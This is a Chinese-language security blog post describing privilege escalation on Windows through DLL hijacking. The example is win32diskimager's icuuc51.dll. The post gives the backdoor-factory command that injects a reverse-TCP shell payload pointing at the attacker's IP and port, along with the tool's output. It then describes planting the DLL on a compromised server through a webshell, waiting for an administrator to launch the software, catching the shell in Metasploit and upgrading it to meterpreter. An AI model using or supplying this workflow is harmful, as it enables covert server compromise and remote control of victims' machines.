FavoriteLoading
0

DLL劫持配合backdoor-factory的提权思路

0x00

网上有许多DLL劫持提权的文章 但是都不是很详细 而且ws2.dll lpk.dll 一些以前的dll也已经被封锁了

自从windows xp sp2开始 就加入了这个机制

注册表路径:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

凡是里面存在的dll就必然是劫持不了的。

但是我们却可以注入应用程序中的dll来达到提权效果

就用win32diskimager 这个软件来进行dll劫持的例子

0x01

首先用process Explorer这个软件来分析win32diskimager都调用了哪些dll文件

%e5%9b%be%e7%89%871

就用icuuc51.dll这个来举例子 可以看到win32diskimager调用软件自带的dll

0x02

接着使用backdoor-factory来对这个dll进行注入后门

root@saya:~# backdoor-factory -f /file/icuuc51.dll -s reverse_shell_tcp_inline -P <your port> -H <yoour ip>

%e5%9b%be%e7%89%872

接着选择2 就完成了后门的生成

[!] Enter your selection: 2   

[!] Using selection: 2

[*] Changing flags for section: .data

[*] Patching initial entry instructions

[*] Creating win32 resume execution stub

[*] Looking for and setting selected shellcode

File icuuc51.dll is in the ‘backdoored’ directory

工具会提示一个存储的地方

0x03

假设我们在webshell 提权的情况下 用菜刀把icuuc51.dll覆盖掉服务器软件原来的icuuc51.dll

我这里搭建了一个简陋的asp环境

%e5%9b%be%e7%89%873

接着监听msf

%e5%9b%be%e7%89%874

等待管理员打开被劫持的软件的dll

当管理员打开软件之后 软件没有任何损坏

%e5%9b%be%e7%89%875

反其看 metasploit这边已经获得了一个shell

%e5%9b%be%e7%89%876

默认backdoor-factory不是用meterpreter的载荷

用此命令将普通shell提升为meterpreter

sessions -u <id>

%e5%9b%be%e7%89%877

【声明】:8090安全小组门户(http://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱hack@ddos.kim,我们会在最短的时间内进行处理。